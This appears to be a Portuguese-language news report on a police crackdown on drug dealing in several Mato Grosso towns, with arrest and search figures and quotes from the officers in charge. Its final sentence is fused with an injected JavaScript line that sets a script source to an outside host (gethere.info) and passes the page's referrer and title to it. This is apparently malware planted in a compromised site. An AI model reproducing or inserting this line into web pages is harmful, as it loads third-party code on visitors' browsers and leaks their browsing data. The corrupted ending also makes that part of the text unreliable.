Os resultados da ofensiva “Civil na Carga Máxima” também apontam êxitos , até a sexta-feira, 04, foram 10 bocas de fumo fechadas,13 mandados de prisão preventivas cumpridas , 40 buscas realizadas e diversos veículos recuperados ao longo da semana nas cidades de Alta Floresta, Paranaíta, Nova Monte Verde, Nova Bandeirantes e Apiacás.
Os esforços começaram na quarta-feira com o cumprimento de mandados de busca e apreensão e diligências diversas que seguiram ao longo de todo o dia nestes municípios.
A ação é coordenada pelo Delegado de Polícia Marcos Cesar Farias Lyra, titular da unidade policial de Paranaíta, sob a supervisão do delegado regional de Alta Floresta Rodrigo Bastos e envolveu todo o efetivo de investigadores e escrivães das cidades.
“Ações como esta são de extrema relevância no combate à criminalidade uma vez que atua junto ao tráfico ‘formiguinha’, pois tal ilícito além de atingir a saúde pública, fomenta de forma significativa a prática de outros delitos”.
“Civil na Carga Máxima” é o nome da megaoperação desencadeada pela Polícia Judiciária Civil em sintonia à determinação de ofensiva à criminalidade em todo o Estado proposta pela Secretaria de Segurança Pública (Sesp).
O delegado regional Rodrigo Bastos deve apresentar hoje um balanço da operação.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;